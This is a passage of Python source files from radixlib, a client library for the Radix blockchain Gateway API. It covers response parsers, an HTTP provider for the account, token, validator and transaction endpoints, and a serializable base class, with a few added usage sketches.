epoch = dictionary['epoch'],
round = dictionary['round'],
)
@classmethod
def from_json_string(
cls,
json_string: str
) -> 'StateIdentifier':
""" Creates a new instance of the StateIdentifier from a string
This method is used to load up a StateIdentifier from the JSON strings that are returned
by the Gateway API.
Args:
json_string (str): The JSON string returned by the gateway API.
Returns:
StateIdentifier: A StateIdentifier loaded with the data
"""
return cls.from_dict(json.loads(json_string))
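# --- Usage sketch (not part of the original module) ---
# StateIdentifier only accepts the combinations validated in the constructor:
# nothing at all, a version alone, a timestamp alone, an epoch alone, or an
# epoch together with a round. The numbers are illustrative values taken from
# the tests and docstrings in this repository.
no_constraint = StateIdentifier()                          # serializes to an empty dict
at_version = StateIdentifier(version=123922)               # {"version": 123922}
at_epoch_round = StateIdentifier(epoch=7024, round=8910)   # {"epoch": 7024, "round": 8910}
# A round on its own (or combined with a timestamp) raises the ValueError above.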
```
#### File: radixlib/parsers/default_parser.py
```python
from typing import Callable, Optional, Dict, Any, List
from radixlib.parsers.base_parser import ParserBase
import radixlib as radix
import dateparser
class DefaultParser(ParserBase):
""" A default parser used to parse the responses of the gateway API into a format that is easy
to query
"""
@classmethod
def parse(
cls,
data: Any,
data_type: str
) -> Any:
""" Routes the parsing of the data to the appropriate parsing function from within the class
This function acts as a router which tries to find the appropriate parsing function within
the class to parse the data. If no parser is implemented for this data type, then the
original data is returned without any parsing.
Args:
data (Any): Data of any type to pass to the parser function
data_type (str): Type of the data or the origin of the data
Returns:
Any: The parsed data
"""
# Getting the parsing function for this data type from the attributes of the class
function_name: str = f'parse_{data_type}'
parsing_function: Optional[Callable[..., Any]] = getattr(cls, function_name, None)
# We try calling the parsing function with the data that we have. If the parsing function
# works, then we return the parsed data. However, if a TypeError or NotImplementedError is
# raised, then we return the original data
try:
parsed_data: Any = parsing_function(data) # type: ignore
return parsed_data if parsed_data is not None else data
except (TypeError, NotImplementedError):
return data
@classmethod
def parse_get_gateway_info(cls, data: Dict[str, Any]) -> Any:
""" A function used for the parsing of the get_gateway_info API calls.
This parser function produces output in the following format::
{
"network_identifier": {
"network": "mainnet"
},
"gateway_api": {
"version": "1.0.1",
"open_api_schema_version": "1.0.3"
},
"ledger_state": {
"version": 78345123,
"timestamp": "2022-02-03T15:24:35.866Z",
"epoch": 7024,
"round": 8910
},
"target_ledger_state": {
"version": 78345127
}
}
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
# No parsing is needed in this case, the default format the data is given in is easy to
# query.
raise NotImplementedError("No implementation for the parse_get_gateway_info")
@classmethod
def parse_derive_account_identifier(cls, data: Dict[str, Dict[str, str]]) -> str:
""" A function used for the parsing of the derive_account_identifier API calls.
Args:
data (dict): A dictionary of the data to parse.
Returns:
str: A string of the derived account address.
"""
return data['account_identifier']['address']
@classmethod
def parse_get_account_balances(cls, data: Dict[Any, Any]) -> Dict[str, Dict[str, int]]:
""" A function used for the parsing of the get_account_balances API calls.
This parser function produces output in the following format::
{
"total_balance": {
"token_rri": "balance of token"
},
"staking_balance": {
"token_rri": "balance of token"
},
"liquid_balance": {
"token_rri": "balance of token"
}
}
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
# Processing the balances into an easy to query dictionary format
final_balances: Dict[str, Dict[str, int]] = {
"total_balance": {},
"staking_balance": {},
"liquid_balance": {},
}
final_balances['staking_balance'][data['account_balances']['staked_and_unstaking_balance']['token_identifier']['rri']] = int(data['account_balances']['staked_and_unstaking_balance']['value'])
for token_balance in data['account_balances']['liquid_balances']:
final_balances['liquid_balance'][token_balance['token_identifier']['rri']] = int(token_balance['value'])
unique_rris: List[str] = list(set(list(final_balances['staking_balance'].keys()) + list(final_balances['liquid_balance'].keys())))
for rri in unique_rris:
balance1: Optional[int] = final_balances['staking_balance'].get(rri)
balance2: Optional[int] = final_balances['liquid_balance'].get(rri)
final_balances['total_balance'][rri] = (0 if balance1 is None else balance1) + (0 if balance2 is None else balance2)
return final_balances
@classmethod
def parse_get_stake_positions(cls, data: Dict[str, Any]) -> Dict[str, List[Dict[str, Any]]]:
""" A function used for the parsing of the get_stake_positions API calls.
This parser function produces output in the following format::
{
"pending_stakes": [
{
"validator_address": "address",
"amount": {
"xrd_rri": "amount"
},
}
],
"stakes": [
{
"validator_address": "address",
"amount": {
"xrd_rri": "amount"
},
}
]
}
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
return {
key: list(map(lambda x: dict([
('validator_address', x['validator_identifier']['address']),
('amount', {
x['delegated_stake']['token_identifier']['rri']: int(x['delegated_stake']['value'])
})
]), value))
for key, value
in data.items()
if key in ['pending_stakes', 'stakes']
}
@classmethod
def parse_get_unstake_positions(cls, data: Dict[str, Any]) -> Dict[str, List[Dict[str, Any]]]:
""" A function used for the parsing of the get_unstake_positions API calls.
This parser function produces output in the following format::
{
"pending_unstakes": [
{
"validator_address": "address",
"amount": {
"xrd_rri": "amount"
},
"epochs_until_unlocked": "amount"
}
],
"unstakes": [
{
"validator_address": "address",
"amount": {
"xrd_rri": "amount"
},
"epochs_until_unlocked": "amount"
}
]
}
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
return {
key: list(map(lambda x: dict([
('validator_address', x['validator_identifier']['address']),
('amount', {
x['delegated_stake']['token_identifier']['rri']: int(x['delegated_stake']['value'])
}),
('epochs_until_unlocked', x['epochs_until_unlocked']),
]), value))
for key, value
in data.items()
if key in ['pending_unstakes', 'unstakes']
}
@classmethod
def parse_get_account_transactions(cls, data: Dict[str, Any]) -> List[Dict[str, Any]]:
""" A function used for the parsing of the get_account_transactions API calls.
This parser function produces output in the following format::
[
{
"hash": data['transaction']['transaction_identifier']['hash'],
"status": data['transaction']['transaction_status']['status'],
"confirmed_time": dateparser.parse(data['transaction']['transaction_status']['confirmed_time']),
"actions": list(map(
lambda x: getattr(radix.actions, x['type']).from_dict(x),
data['transaction']['actions']
)),
"fee_paid": {
data['transaction']['fee_paid']['token_identifier']['rri']: int(data['transaction']['fee_paid']['value'])
},
"transaction_blob": data['transaction']['metadata']['hex'],
"message_blob": data['transaction']['metadata'].get('message'),
}
]
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
return list(map(
lambda x: cls.parse({'transaction': x}, 'transaction_status'),
data['transactions']
))
@classmethod
def parse_get_native_token_info(cls, data: Any) -> Any:
""" A function used for the parsing of the get_native_token_info API calls.
This parser function produces output in the following format::
{
"rri": "token_rri",
"total_supply": "amount"
"total_minted": "amount"
"total_burned": "amount"
"name": "token_name"
"description": "token_description",
"icon_url": "token_icon_url",
"url": "token_url",
"symbol": "token_symbol",
"is_supply_mutable": "token_is_supply_mutable",
"granularity": "token_granularity",
}
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
return cls.parse(data, 'get_token_info')
@classmethod
def parse_get_token_info(cls, data: Any) -> Any:
""" A function used for the parsing of the get_token_info API calls.
This parser function produces output in the following format::
{
"rri": "token_rri",
"total_supply": "amount"
"total_minted": "amount"
"total_burned": "amount"
"name": "token_name"
"description": "token_description",
"icon_url": "token_icon_url",
"url": "token_url",
"symbol": "token_symbol",
"is_supply_mutable": "token_is_supply_mutable",
"granularity": "token_granularity",
}
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
return {
"rri": data['token']['token_identifier']['rri'],
"total_supply": int(data['token']['token_supply']['value']),
"total_minted": int(data['token']['info']['total_minted']['value']),
"total_burned": int(data['token']['info']['total_burned']['value']),
"name": data['token']['token_properties']['name'],
"description": data['token']['token_properties']['description'],
"icon_url": data['token']['token_properties']['icon_url'],
"url": data['token']['token_properties']['url'],
"symbol": data['token']['token_properties']['symbol'],
"is_supply_mutable": bool(data['token']['token_properties']['is_supply_mutable']),
"granularity": int(data['token']['token_properties']['granularity']),
}
@classmethod
def parse_derive_token_identifier(cls, data: Dict[str, Dict[str, str]]) -> str:
""" A function used for the parsing of the derive_token_identifier API calls.
Args:
data (dict): A dictionary of the data to parse.
Returns:
str: A string of the token RRI
"""
return data['token_identifier']['rri']
@classmethod
def parse_get_validator(cls, data: Dict[str, Any]) -> Dict[str, Any]:
""" A function used for the parsing of the get_validator API calls.
This parser function produces output in the following format::
{
"validator_address": "address",
"stake": {
"xrd_rri": "amount"
},
"owner_stake": {
"xrd_rri": "amount"
},
"uptime": {
"epoch_range": {
"from": "from_epoch",
"to": "to_epoch"
},
"uptime_percentage": "uptime_percentage",
"proposals_missed": "proposals_missed",
"proposals_completed": "proposals_completed"
},
"url": "url",
"validator_fee_percentage": "validator_fee_percentage",
"name": "name",
"registered": "registered",
"owner_account_address": "owner_account_address",
"external_stake_accepted": "external_stake_accepted",
}
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
return {
"validator_address": data['validator']['validator_identifier']['address'],
"stake": {
data['validator']['stake']['token_identifier']['rri']: int(data['validator']['stake']['value'])
},
"owner_stake": {
data['validator']['info']['owner_stake']['token_identifier']['rri']: int(data['validator']['info']['owner_stake']['value'])
},
"uptime": data['validator']['info']['uptime'],
"url": data['validator']['properties']['url'],
"validator_fee_percentage": data['validator']['properties']['validator_fee_percentage'],
"name": data['validator']['properties']['name'],
"registered": bool(data['validator']['properties']['registered']),
"owner_account_address": data['validator']['properties']['owner_account_identifier']['address'],
"external_stake_accepted": data['validator']['properties']['external_stake_accepted'],
}
@classmethod
def parse_get_validator_identifier(cls, data: Dict[str, Dict[str, str]]) -> str:
""" A function used for the parsing of the get_validator_identifier API calls.
Args:
data (dict): A dictionary of the data to parse.
Returns:
str: A string of the validator address
"""
return data['validator_identifier']['address']
@classmethod
def parse_get_validators(cls, data: Dict[str, Any]) -> List[Dict[str, Any]]:
""" A function used for the parsing of the get_validators API calls.
This parser function produces output in the following format::
[
{
"validator_address": "address",
"stake": {
"xrd_rri": "amount"
},
"owner_stake": {
"xrd_rri": "amount"
},
"uptime": {
"epoch_range": {
"from": "from_epoch",
"to": "to_epoch"
},
"uptime_percentage": "uptime_percentage",
"proposals_missed": "proposals_missed",
"proposals_completed": "proposals_completed"
},
"url": "url",
"validator_fee_percentage": "validator_fee_percentage",
"name": "name",
"registered": "registered",
"owner_account_address": "owner_account_address",
"external_stake_accepted": "external_stake_accepted",
}
]
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
return list(map(
lambda x: cls.parse({'validator': x}, 'get_validator'),
data['validators']
))
@classmethod
def parse_get_validator_stakes(cls, data: Any) -> Any:
""" A function used for the parsing of the get_validator_stakes API calls.
This parser function produces output in the following format::
[
{
"validator_address": "address",
"account_address": "address",
"total_pending_stake": {
"xrd_rri": "amount"
},
"total_stake": {
"xrd_rri": "amount"
},
"total_pending_unstake": {
"xrd_rri": "amount"
},
"total_unstaking": {
"xrd_rri": "amount"
},
}
]
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
return [{
"validator_address": info['validator']['address'],
"account_address": info['account']['address'],
"total_pending_stake": {
info['total_pending_stake']['token_identifier']['rri']: int(info['total_pending_stake']['value'])
},
"total_stake": {
info['total_stake']['token_identifier']['rri']: int(info['total_stake']['value'])
},
"total_pending_unstake": {
info['total_pending_unstake']['token_identifier']['rri']: int(info['total_pending_unstake']['value'])
},
"total_unstaking": {
info['total_unstaking']['token_identifier']['rri']: int(info['total_unstaking']['value'])
},
}
for info
in data['account_stake_delegations']
]
@classmethod
def parse_get_transaction_rules(cls, data: Any) -> Any:
""" A function used for the parsing of the get_transaction_rules API calls.
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
# No parsing is implemented for this call; the router returns the data unchanged.
raise NotImplementedError("No implementation for the parse_get_transaction_rules")
@classmethod
def parse_build_transaction(cls, data: Dict[str, Any]) -> Dict[str, Any]:
""" A function used for the parsing of the build_transaction API calls.
This parser function produces output in the following format::
{
"fee": {
"xrd_rri": "amount"
},
"unsigned_transaction": "transaction_blob",
"payload_to_sign": "payload_blob"
}
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
return {
"fee": {
data['transaction_build']['fee']['token_identifier']['rri']: int(data['transaction_build']['fee']['value'])
},
"unsigned_transaction": data['transaction_build']['unsigned_transaction'],
"payload_to_sign": data['transaction_build']['payload_to_sign'],
}
@classmethod
def parse_finalize_transaction(cls, data: Dict[str, Any]) -> Dict[str, str]:
""" A function used for the parsing of the finalize_transaction API calls.
This parser function produces output in the following format::
{
"signed_transaction": "transaction_blob",
"transaction_hash": "hash"
}
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
return {
"signed_transaction": data['signed_transaction'],
"transaction_hash": data['transaction_identifier']['hash']
}
@classmethod
def parse_submit_transaction(cls, data: Dict[str, Dict[str, str]]) -> str:
""" A function used for the parsing of the submit_transaction API calls.
Args:
data (dict): A dictionary of the data to parse.
Returns:
str: A string of the transaction hash
"""
return data['transaction_identifier']['hash']
@classmethod
def parse_transaction_status(cls, data: Any) -> Any:
""" A function used for the parsing of the transaction_status API calls.
This parser function produces output in the following format::
{
"hash": "tx_hash",
"status": "tx_status",
"confirmed_time": "datetime",
"actions": [],
"fee_paid": {
"xrd_rri": "amount"
},
"transaction_blob": "blob",
"message_blob": "blob"
}
Args:
data (dict): A dictionary of the data to parse.
Returns:
dict: A dictionary of the parsed data.
"""
return {
"hash": data['transaction']['transaction_identifier']['hash'],
"status": data['transaction']['transaction_status']['status'],
"confirmed_time": dateparser.parse(data['transaction']['transaction_status']['confirmed_time']),
"actions": list(map(
lambda x: getattr(radix.actions, x['type']).from_dict(x),
data['transaction']['actions']
)),
"fee_paid": {
data['transaction']['fee_paid']['token_identifier']['rri']: int(data['transaction']['fee_paid']['value'])
},
"transaction_blob": data['transaction']['metadata']['hex'],
"message_blob": data['transaction']['metadata'].get('message'),
}
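# --- Usage sketch (not part of the original module) ---
# The parse classmethod routes to a parse_<data_type> method; data types without
# a parser fall through and are returned untouched. The dictionary below is a
# hypothetical, truncated Gateway API style response used only to show the call shape.
raw_response = {"token_identifier": {"rri": "xrd_tr1qyf0x76s"}}
token_rri = DefaultParser.parse(raw_response, "derive_token_identifier")   # -> "xrd_tr1qyf0x76s"
unparsed = DefaultParser.parse(raw_response, "no_such_parser")             # -> raw_response unchanged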
```
#### File: src/radixlib/provider.py
```python
from radixlib.api_types.identifiers import (
TransactionIdentifier,
ValidatorIdentifier,
NetworkIdentifier,
AccountIdentifier,
TokenIdentifier,
StateIdentifier,
)
from radixlib.actions import ActionType
from radixlib.network import Network
import radixlib as radix
import requests
from typing import Optional, Any, Dict, Union, List
class Provider():
""" An implementation of a provider for the Gateway API of the Radix blockchain.
This provider is implemented in a way that makes it easy to make requests to the API. However,
it is not the job of the provider to parse the responses from the API. The provider only goes
as far as trying to load the response as JSON if it's possible, but that is about it. This is
because the provider's job is to provide an easy way to communicate with the gateway API, not to
parse responses.
"""
def __init__(
self,
network: Network,
custom_gateway_url: Optional[str] = None,
open_api_version: str = "1.1.2",
) -> None:
""" Instantiates a new provider object through the passed parameters for the given network.
This method is used to create a new provider object for the given network object passed in
the arguments. The provider supports default RPC urls for both the mainnet and the stokenet.
Aside from that, if you wish to connect to some other network, the :obj:`custom_gateway_url`
argument is no longer optional.
Args:
network (Network): The type of network that the provider will connect to.
custom_gateway_url (:obj:`str`, optional): An optional argument that defaults to None.
This is the url of the RPC to connect to if we wish to connect to a custom gateway.
open_api_version (str): An optional argument that defaults to "1.1.2" and it defines the
value for the X-Radixdlt-Target-Gw-Api header which is requested by the gateway API.
Raises:
ValueError: Raised when a network other than the mainnet or the stokenet is used without
providing a custom_gateway_url.
"""
# Checking to see if the network provides a default gateway URL or not
if network.default_gateway_url or custom_gateway_url:
self.base_url: str = custom_gateway_url or network.default_gateway_url # type: ignore
self.network: Network = network
self.open_api_version: str = open_api_version
else:
raise ValueError(
"The network provided does not have a default gateway API URL and no URL was "
"supplied to the custom_gateway_url"
)
def __str__(self) -> str:
""" Represents the provider as a string """
return f"Provider(base_url={self.base_url}, network={self.network.name}, open_api_version={self.open_api_version})"
def __repr__(self) -> str:
""" Represents the provider """
return str(self)
def __dispatch(
self,
endpoint: str,
params: Dict[Any, Any],
http_method: str = "POST"
) -> Dict[Any, Any]:
""" Dispatches HTTP calls to the endpoints with the params provided
Args:
endpoint (str): The endpoint to make the HTTP call to.
params (dict): The JSON payload to include in the request body.
http_method (str): The type of request to make, defaults to a POST request.
Returns:
dict: A dictionary of the response from the API.
Raises:
TypeError: Raised if the response from the API is not a JSON response.
"""
# The network identifier is always in the JSON body of all requests made to the gateway API.
# So, we add the network identifier to the request parameters
params['network_identifier'] = NetworkIdentifier(self.network)
# Making the request to the gateway API
response: requests.Response = requests.request(
method = str(http_method),
url = f'{self.base_url}/{endpoint}',
json = radix.utils.remove_none_values_recursively(
radix.utils.convert_to_dict_recursively(
iterable = params # type: ignore
)
),
headers = {
"X-Radixdlt-Target-Gw-Api": self.open_api_version
}
)
# Checking the type of the content sent back from the API. If the content is in JSON then
# we are good. If not then we throw an exception.
if "application/json" not in str(response.headers.get('content-type')):
raise TypeError(
f"The provider expects a JSON response but got a response of the type: "
f"{str(response.headers.get('content-type'))}. Response: {response.text}"
)
# Converting the response body to JSON and checking if there are errors in the response
json_response: Dict[Any, Any] = response.json()
return json_response
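# Illustrative note (hedged): a call such as
#   self.__dispatch(endpoint="token", params={"token_identifier": TokenIdentifier(rri)})
# has its params converted with convert_to_dict_recursively, stripped of None
# values, given the network_identifier, and POSTed to f"{self.base_url}/token"
# with the X-Radixdlt-Target-Gw-Api header set to self.open_api_version.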
# #######################################
# ---------- Gateway Endpoints ----------
# #######################################
def get_gateway_info(self) -> Dict[str, Any]:
""" Returns the Gateway API version, network and current ledger state. """
return self.__dispatch(
endpoint = "gateway",
params = {}
)
# #######################################
# ---------- Account Endpoints ----------
# #######################################
def derive_account_identifier(
self,
public_key: str
) -> Dict[str, Any]:
""" Derives the wallet address for the given public key.
This method is similar to the `derive.wallet_address_from_public_key` method with the only
exception being that in this case we're asking the node to derive the account identifier
(wallet address) for us. This might be useful if the network's HRPs suddenly change, or in
any other case where computing the wallet address locally does not make sense.
Args:
public_key (str): The public key to derive the wallet address for.
Returns:
Dict[str, Any]: A dictionary of the account identifier.
"""
return self.__dispatch(
endpoint = "account/derive",
params = {
"public_key": {
"hex": public_key
}
}
)
def get_account_balances(
self,
account_address: str,
state_identifier: Optional[StateIdentifier] = None
) -> Dict[str, Any]:
""" Returns an account's available and staked token balances, given an account address.
Args:
account_address (str): The account to get the balances for.
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
Returns:
dict: A dictionary of the account balances
"""
return self.__dispatch(
endpoint = "account/balances",
params = {
"account_identifier": AccountIdentifier(account_address),
"at_state_identifier": state_identifier
}
)
def get_stake_positions(
self,
account_address: str,
state_identifier: Optional[StateIdentifier] = None
) -> Dict[str, Any]:
""" Returns the xrd which the account has in pending and active delegated stake positions
with validators, given an account address.
Args:
account_address (str): The account to get the stakes for.
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
Returns:
dict: A dictionary of the account stake positions.
"""
return self.__dispatch(
endpoint = "account/stakes",
params = {
"account_identifier": AccountIdentifier(account_address),
"at_state_identifier": state_identifier
}
)
def get_unstake_positions(
self,
account_address: str,
state_identifier: Optional[StateIdentifier] = None
) -> Dict[str, Any]:
""" Returns the xrd which the account has in pending and temporarily-locked delegated
unstake positions with validators, given an account address.
Args:
account_address (str): The account to get the unstakes for.
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
Returns:
dict: A dictionary of the account unstake positions.
"""
return self.__dispatch(
endpoint = "account/unstakes",
params = {
"account_identifier": AccountIdentifier(account_address),
"at_state_identifier": state_identifier
}
)
def get_account_transactions(
self,
account_address: str,
state_identifier: Optional[StateIdentifier] = None,
cursor: Optional[str] = None,
limit: int = 30,
) -> Dict[str, Any]:
""" Returns user-initiated transactions involving the given account address which have been
successfully committed to the ledger. The transactions are returned in a paginated format,
ordered by most recent.
Args:
account_address (str): The account to get the transactions for.
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
cursor (:obj:`str`, optional): A timestamp of when to begin getting transactions.
limit (int): The page size requested. The maximum value is 30 at present
Returns:
dict: A dictionary of the transactions information.
"""
return self.__dispatch(
endpoint = "account/transactions",
params = {
"account_identifier": AccountIdentifier(account_address),
"at_state_identifier": state_identifier,
"cursor": cursor,
"limit": limit
},
)
# ######################################
# ---------- Token Endpoints ----------
# ######################################
def get_native_token_info(
self,
state_identifier: Optional[StateIdentifier] = None
) -> Dict[str, Any]:
""" Returns information about XRD, including its Radix Resource Identifier (RRI).
Args:
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
Returns:
dict: A dictionary of the token information
"""
return self.__dispatch(
endpoint = "token/native",
params = {
"at_state_identifier": state_identifier,
}
)
def get_token_info(
self,
token_rri: str,
state_identifier: Optional[StateIdentifier] = None
) -> Dict[str, Any]:
""" Returns information about any token, given its Radix Resource Identifier (RRI).
Args:
token_rri (str): The RRI of the token to get the information for.
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
Returns:
dict: A dictionary of the token information
"""
return self.__dispatch(
endpoint = "token",
params = {
"token_identifier": TokenIdentifier(token_rri),
"at_state_identifier": state_identifier,
}
)
def derive_token_identifier(
self,
public_key: str,
symbol: str
) -> Dict[str, Any]:
""" Returns the Radix Resource Identifier of a token with the given symbol, created by an
account with the given public key.
Args:
public_key (str): The public key of the token creator.
symbol (str): The 3 to 8 character long symbol assigned to the token.
Returns:
dict: A dictionary containing the token's RRI.
"""
return self.__dispatch(
endpoint = "token/derive",
params = {
"symbol": symbol.lower(),
"public_key": {
"hex": public_key
}
}
)
# #########################################
# ---------- Validator Endpoints ----------
# #########################################
def get_validator(
self,
validator_address: str,
state_identifier: Optional[StateIdentifier] = None
) -> Dict[str, Any]:
""" Returns information about a validator, given a validator address
Args:
validator_address (str): An identifier for the validator to get info on.
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
Returns:
dict: A dictionary of the validator info.
"""
return self.__dispatch(
endpoint = "validator",
params = {
"validator_identifier": ValidatorIdentifier(validator_address),
"at_state_identifier": state_identifier
}
)
def get_validator_identifier(
self,
public_key: str,
) -> Dict[str, Any]:
""" Returns the validator address associated with the given public key
Args:
public_key (str): The public key of the validator
Returns:
dict: A dictionary of the validator info.
"""
return self.__dispatch(
endpoint = "validator/derive",
params = {
"public_key": {
"hex": public_key
}
}
)
def get_validators(
self,
state_identifier: Optional[StateIdentifier] = None
) -> Dict[str, Any]:
""" Returns information about all validators.
Args:
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
Returns:
dict: A dictionary of the validators
"""
return self.__dispatch(
endpoint = "validators",
params = {
"at_state_identifier": state_identifier
}
)
def get_validator_stakes(
self,
validator_address: str,
state_identifier: Optional[StateIdentifier] = None,
cursor: Optional[str] = None,
limit: int = 30,
) -> Dict[str, Any]:
""" Returns paginated results about the delegated stakes from accounts to a validator. The
results are totalled by account, and ordered by account age (oldest to newest).
Args:
validator_address (str): A string of the validator address
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
cursor (:obj:`str`, optional): A timestamp of when to begin getting transactions.
limit (int): The page size requested. The maximum value is 30 at present.
Returns:
dict: A dictionary of the validator stakes
"""
return self.__dispatch(
endpoint = "validator/stakes",
params = {
"at_state_identifier": state_identifier,
"validator_identifier": ValidatorIdentifier(validator_address),
"cursor": cursor,
"limit": limit
}
)
# ###########################################
# ---------- Transaction Endpoints ----------
# ###########################################
def get_transaction_rules(
self,
state_identifier: Optional[StateIdentifier] = None
) -> Dict[str, Any]:
""" Returns the current rules used to build and validate transactions in the Radix Engine.
Args:
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
Returns:
dict: A dictionary of the transaction rules.
"""
return self.__dispatch(
endpoint = "transaction/rules",
params = {}
)
def build_transaction(
self,
actions: Union[List[ActionType], radix.ActionBuilder],
fee_payer: str,
message_bytes: Optional[Union[str, bytes, bytearray]] = None,
state_identifier: Optional[StateIdentifier] = None,
disable_token_mint_and_burn: Optional[bool] = None,
) -> Dict[str, Any]:
""" Returns a built unsigned transaction payload, from a set of intended actions.
Args:
actions (Union[List[ActionType], radix.ActionBuilder]): Either a list of actions or an
ActionBuilder used to create the actions.
fee_payer (str): The address of the wallet paying the fees of the transaction.
message_bytes (Union[str, bytes, bytearray], optional): An optional argument for the
message to include in the transaction. This argument expects the bytes to be passed
to it. So, this should either be the hex string of the bytes or a bytes object.
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
disable_token_mint_and_burn (bool, optional): If true, mints and burns (aside from fee
payments) are not permitted during transaction execution.
Returns:
dict: A dictionary of the transaction details and blob
"""
return self.__dispatch(
endpoint = "transaction/build",
params = {
"at_state_identifier": state_identifier,
"actions": actions if isinstance(actions, list) else actions.to_action_list(),
"fee_payer": AccountIdentifier(fee_payer),
"message": message_bytes.hex() if isinstance(message_bytes, (bytes, bytearray)) else message_bytes,
"disable_token_mint_and_burn": disable_token_mint_and_burn
}
)
def finalize_transaction(
self,
unsigned_transaction: Union[str, bytes, bytearray],
signature_der: Union[str, bytes, bytearray],
public_key: str,
submit: Optional[bool] = None
) -> Dict[str, Any]:
""" Returns a signed transaction payload and transaction identifier, from an unsigned
transaction payload and signature.
Args:
unsigned_transaction (Union[str, bytes, bytearray]): A bytes like object containing the
transaction blob.
signature_der (Union[str, bytes, bytearray]): A bytes like object of the signature in
the DER format.
public_key (str): The public key of the sender of the transaction.
submit (Optional[bool]): An optional boolean which defines whether or not a transaction
should be submitted immediately upon finalization.
Returns:
dict: A dictionary of the signed transaction information.
"""
return self.__dispatch(
endpoint = "transaction/finalize",
params = {
"unsigned_transaction": unsigned_transaction if isinstance(unsigned_transaction, str) else unsigned_transaction.hex(),
"signature": {
"bytes": signature_der if isinstance(signature_der, str) else signature_der.hex(),
"public_key": {
"hex": public_key,
}
},
"submit": submit
}
)
def submit_transaction(
self,
signed_transaction: Union[str, bytes, bytearray]
) -> Dict[str, Any]:
""" Submits a signed transaction payload to the network. The transaction identifier from
finalize or submit can then be used to track the transaction status.
Args:
signed_transaction (Union[str, bytes, bytearray]): A string or bytes like object which
contains the bytes of the signed transaction to submit to the network.
Returns:
dict: A dictionary of the submitted transaction information.
"""
return self.__dispatch(
endpoint = "transaction/submit",
params = {
"signed_transaction": signed_transaction if isinstance(signed_transaction, str) else signed_transaction.hex(),
}
)
def transaction_status(
self,
transaction_hash: str,
state_identifier: Optional[StateIdentifier] = None,
) -> Dict[str, Any]:
""" Returns the status and contents of the transaction with the given transaction identifier.
Transaction identifiers which aren't recognised as either belonging to a committed
transaction or a transaction submitted through this Network Gateway may return a
TransactionNotFoundError. Transaction identifiers relating to failed transactions will,
after a delay, also be reported as a TransactionNotFoundError.
Args:
transaction_hash (str): An identifier for the transaction
state_identifier (:obj:`StateIdentifier`, optional): An optional argument that defaults
to None. Allows a client to request a response referencing an earlier ledger state.
Return:
dict: A dictionary of the transaction information.
"""
return self.__dispatch(
endpoint = "transaction/status",
params = {
"transaction_identifier": TransactionIdentifier(transaction_hash),
"at_state_identifier": state_identifier,
}
)
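# --- Usage sketch (not part of the original module) ---
# A hedged illustration of how the provider is meant to be used. It assumes that
# radixlib exposes a predefined stokenet Network object with a default gateway
# URL (the exact attribute name below is an assumption); otherwise pass a
# custom_gateway_url explicitly. The account address is a placeholder taken from
# the test fixtures in this repository.
provider = Provider(network=radix.network.STOKENET)  # hypothetical constant
balances_response = provider.get_account_balances(
    account_address="tdx1qspqqecwh3tgsgz92l4d4f0e4egmfe86049dj75pgq347fkkfmg84pgx9um0v"
)
# The raw JSON response can then be handed to a parser such as the DefaultParser.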
```
#### File: src/radixlib/serializable.py
```python
from abc import ABC, abstractmethod
from typing import Dict, Any
class Serializable(ABC):
""" An abstrat implementation of a serializable class. """
@abstractmethod
def to_dict(self) -> Dict[Any, Any]:
""" Converts the object to a dictionary """
pass
@abstractmethod
def to_json_string(self) -> str:
""" Converts the object to a JSON string """
pass
@classmethod
@abstractmethod
def from_dict(cls, dictionary: Dict[Any, Any]) -> object:
""" Loads an object from a dictionary """
pass
@classmethod
@abstractmethod
def from_json_string(cls, json_string: str) -> object:
""" Loads an object from a JSON string """
pass
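# --- Usage sketch (not part of the original module) ---
# A minimal, hypothetical concrete subclass showing the four methods that every
# Serializable implementation (identifiers, actions, ...) has to provide.
import json
class ExampleIdentifier(Serializable):
    def __init__(self, value: str) -> None:
        self.value: str = value
    def to_dict(self) -> Dict[Any, Any]:
        return {"value": self.value}
    def to_json_string(self) -> str:
        return json.dumps(self.to_dict())
    @classmethod
    def from_dict(cls, dictionary: Dict[Any, Any]) -> 'ExampleIdentifier':
        return cls(dictionary["value"])
    @classmethod
    def from_json_string(cls, json_string: str) -> 'ExampleIdentifier':
        return cls.from_dict(json.loads(json_string))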
```
#### File: tests/actions/test_mint_tokens_action.py
```python
from radixlib.actions import MintTokens
